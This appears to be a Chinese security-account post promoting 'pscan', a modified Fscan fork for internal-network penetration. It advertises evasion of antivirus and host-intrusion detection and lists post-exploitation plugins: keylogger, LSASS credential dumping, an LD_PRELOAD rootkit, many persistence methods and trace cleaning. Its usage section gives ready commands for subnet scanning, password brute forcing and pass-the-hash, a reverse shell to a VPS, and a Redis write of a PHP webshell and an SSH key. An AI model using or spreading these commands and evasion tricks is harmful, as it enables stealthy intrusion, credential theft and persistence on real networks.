内网扫描爆破后渗透一站式落地)
0x01 工具介绍
pscan作为红队专属内网渗透新利器,基于Fscan最新版本二次魔改优化,彻底告别原版工具特征暴露问题,完美支持主流安全软件免杀绕过。工具重构全部命令参数、去除官方指纹特征,支持静默无痕迹运行,集内网存活探测、端口扫描、弱口令爆破、POC漏洞检测、后渗透利用功能于一体,实现内网渗透全流程一站式落地,适配各类实战攻防场景。
注意:现在只对常读和星标的才展示大图推送,建议大家把渗透安全HackTwo"设为星标⭐️"否则可能就看不到了啦!
下载地址在末尾 #渗透安全HackTwo
0x02 功能介绍
✨魔改版本功能
本版本对原版 fscan 做了以下修改以规避 HIDS 特征检测:
| 修改项 | 说明 |
|---|---|
| 参数名混淆 | 所有命令行参数重命名(见下方映射表) |
| Banner 静默 | 启动时不输出 fscan ASCII Logo 和版本信息 |
| 模块名重命名 | Go 模块路径改为scanner/core,去除项目名特征 |
| 预编译二进制 | 提供pscan.exe和core.exe两个版本 |
免杀效果
原版 ↔ 魔改参数映射:
| 原参数 | 魔改后 | 说明 |
|---|---|---|
-h | -t | 目标 IP / 网段 / 域名 |
-eh | -et | 排除主机 |
-ehf | -etf | 排除主机文件 |
-p | -tp | 端口 |
-ep | -etp | 排除端口 |
-hf | -tf | 主机列表文件 |
-pf | -tpf | 端口列表文件 |
-m | -st | 扫描模式 |
-t(线程) | -tn | 端口扫描线程数 |
-time | -tm | 超时时间(秒) |
-user | -usr | 用户名 |
-pwd | -pw | 密码 |
-usera | -ua | 额外用户名 |
-pwda | -pa | 额外密码 |
-userf | -usrf | 用户名字典文件 |
-pwdf | -pf | 密码字典文件 |
-upf | -up | 用户名:密码对文件 |
-hashf | -hf | 哈希文件 |
-hash | -hv | 哈希值 |
-domain | -dm | 域名 |
-sshkey | -sk | SSH 私钥 |
后渗透插件列表
通过-local参数调用:
| 插件名 | 功能 | 平台 |
|---|---|---|
systeminfo | 系统信息收集 | 全平台 |
reverseshell | 反弹 Shell | 全平台 |
forwardshell | 正向 Shell | Windows |
socks5proxy | 启动 SOCKS5 代理 | 全平台 |
keylogger | 键盘记录 | Windows |
minidump | LSASS 凭据提取 | Windows |
sshkey | SSH 公钥注入 | Linux |
cleaner | 痕迹清理 | 全平台 |
crontask | Cron 持久化 | Linux |
systemdservice | Systemd 服务持久化 | Linux |
ldpreload | LD_PRELOAD Rootkit | Linux |
winregistry | 注册表持久化 | Windows |
winschtask | 计划任务持久化 | Windows |
winservice | 服务持久化 | Windows |
winstartup | 启动项持久化 | Windows |
winlogon | 登录脚本持久化 | Windows |
winwmi | WMI 持久化 | Windows |
winbits | BITS 任务持久化 | Windows |
winifeo | IFEO 持久化 | Windows |
WebUI 模式
本工具内置了 Web 管理界面(需使用 web 版本编译)。
# 启动 Web 服务pscan-web.exe# 指定监听端口pscan-web.exe -u# 启动后访问 http://127.0.0.1:8080
WebUI 功能:
图形化扫描任务管理
实时 WebSocket 结果推送
扫描预设保存
资产项目管理
多语言支持(中文/English)
深色模式
0x03 更新介绍
11 个检测模块:SQLi / XSS / CMDi / LFI / RCE / SSRF / XXE / API / 敏感信息 / WAF / JSPathFinder 支持 GUI 图形界面和命令行两种模式 多种报告格式:JSON / HTML / CSV / Markdown / Console 基于 WVS v19.2 开源更名0x04 使用介绍
📦安装与使用指南
内网扫描
# 全量扫描整个 C 段(最常用) pscan.exe -t 192.168.1.0/24 # 仅存活探测(快速定位在线主机) pscan.exe -t 192.168.1.0/24 -ao # ICMP 模式存活探测 pscan.exe -t 192.168.1.0/24 -st icmp # 存活探测 + 仅在线主机做端口扫描(跳过离线主机) pscan.exe -t 192.168.1.0/24 -ao -st all # 扫描多个网段 pscan.exe -t 192.168.1.0/24,10.10.0.0/16 # 扫描 IP 范围 pscan.exe -t 192.168.1.1-100 # 排除特定主机 pscan.exe -t 192.168.1.0/24 -et 192.168.1.1,192.168.1.254 # 从文件读取目标列表 pscan.exe -tf targets.txt
端口与协议控制
# 扫描指定端口 pscan.exe -t 192.168.1.0/24 -tp 22,80,443,3306,3389,6379 # 扫描常用 Web 端口 pscan.exe -t 192.168.1.0/24 -tp 80,81,443,8080,8443,9090 # 扫描全部端口(慢,谨慎使用) pscan.exe -t 192.168.1.0/24 -tp 1-65535 -tn 1000 # 排除特定端口 pscan.exe -t 192.168.1.0/24 -etp 445,139 # 跳过 Ping 探测(纯 TCP 扫描,适合禁 Ping 环境) pscan.exe -t 192.168.1.0/24 -np # 跳过 TCP 补充探测 pscan.exe -t 192.168.1.0/24 -ntp # 调整扫描线程和超时(网络差时降低线程数) pscan.exe -t 192.168.1.0/24 -tn 200 -tm 5 # 限制发包速率(规避流量检测) pscan.exe -t 192.168.1.0/24 -rate 1000弱口令爆破
# 全量扫描 + 自动爆破(默认开启) pscan.exe -t 192.168.1.0/24 # 禁用爆破(只扫端口和服务识别) pscan.exe -t 192.168.1.0/24 -nobr # 指定自定义凭据 pscan.exe -t 192.168.1.0/24 -usr admin -pw admin123 # 使用字典文件 pscan.exe -t 192.168.1.0/24 -usrf users.txt -pf pass.txt # 使用用户名:密码对文件(每行 user:pass) pscan.exe -t 192.168.1.0/24 -up creds.txt # 添加额外用户/密码(与原字典合并) pscan.exe -t 192.168.1.0/24 -ua root,admin -pa 123456,password # 指定域名(用于域认证爆破) pscan.exe -t 192.168.1.0/24 -dm corp.local # SSH 私钥登录 pscan.exe -t 192.168.1.100 -sk id_rsa # NTLM 哈希传递 pscan.exe -t 192.168.1.100 -hv "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"Web 扫描
# 扫描单个 Web 站点 pscan.exe -u http://192.168.1.100:8080 # 扫描多个 URL pscan.exe -u http://192.168.1.100 -tp 80,443,8080 # 带 Cookie 扫描 pscan.exe -u http://192.168.1.100 -cookie "PHPSESSID=xxx" # 使用 HTTP 代理 pscan.exe -u http://192.168.1.100 -proxy http://127.0.0.1:8080 # 使用 SOCKS5 代理 pscan.exe -t 192.168.1.0/24 -socks5 socks5://127.0.0.1:1080 # 指定网卡(VPN 场景) pscan.exe -t 10.8.0.0/24 -iface 10.8.0.5POC 漏洞检测
# 全量扫描 + POC 检测(默认开启) pscan.exe -t 192.168.1.0/24 # 禁用 POC 扫描(加快速度) pscan.exe -t 192.168.1.0/24 -nopoc # 全量 POC 扫描(更全面但更慢) pscan.exe -t 192.168.1.0/24 -full # 指定 POC 名称 pscan.exe -t 192.168.1.100 -pocname thinkphp # 自定义 POC 脚本目录 pscan.exe -t 192.168.1.100 -pocpath ./custom-pocs/ # 调整 POC 并发数 pscan.exe -t 192.168.1.0/24 -num 10 # 启用 DNSLog pscan.exe -t 192.168.1.0/24 -dns凭据复用与哈希传递
# NTLM 哈希传递(配合爆破模块使用) pscan.exe -t 192.168.1.100 -hv "31d6cfe0d16ae931b73c59d7e0c089c0" # 哈希文件批量传递 pscan.exe -t 192.168.1.0/24 -hf hashes.txt # 复用域用户凭据 pscan.exe -t 192.168.1.0/24 -usr administrator -pw P@ssw0rd -dm corp.local后渗透利用
# 查看所有可用本地插件 pscan.exe -local list # 收集系统信息 pscan.exe -local systeminfo # 反弹 Shell(先在外网 VPS 监听) pscan.exe -local reverseshell -rsh your-vps.com:4444 # 启动正向 Shell(等待目标连接) pscan.exe -local forwardshell -fsh-port 4444 # 启动 SOCKS5 代理(本地监听 1080) pscan.exe -local socks5proxy -start-socks5 1080 # Redis 写公钥 pscan.exe -t 192.168.1.100 -st redis -rs "ssh-rsa AAAAB3N..." # Redis 写 Webshell pscan.exe -t 192.168.1.100 -st redis -rwp /var/www/html -rwc "<?php system($_GET['cmd']);?>" # 键盘记录 pscan.exe -local keylogger -keylog-output keylog.txt # LSASS 凭证提取 pscan.exe -local minidump # Windows 持久化(启动项) pscan.exe -local winstartup -win-pe C:\shell.exe # 清理痕迹 pscan.exe -local cleaner输出控制
# 指定输出文件 pscan.exe -t 192.168.1.0/24 -o scan-result.txt # JSON 格式输出 pscan.exe -t 192.168.1.0/24 -f json -o result.json # CSV 格式输出 pscan.exe -t 192.168.1.0/24 -f csv -o result.csv # 不保存文件,仅屏幕输出 pscan.exe -t 192.168.1.0/24 -no # 静默模式(减少输出量) pscan.exe -t 192.168.1.0/24 -silent # 调试模式(详细日志) pscan.exe -t 192.168.1.0/24 -debug # 输出性能统计 pscan.exe -t 192.168.1.0/24 -perf下载
《渗透安全HackTwo》回复20260619获取下载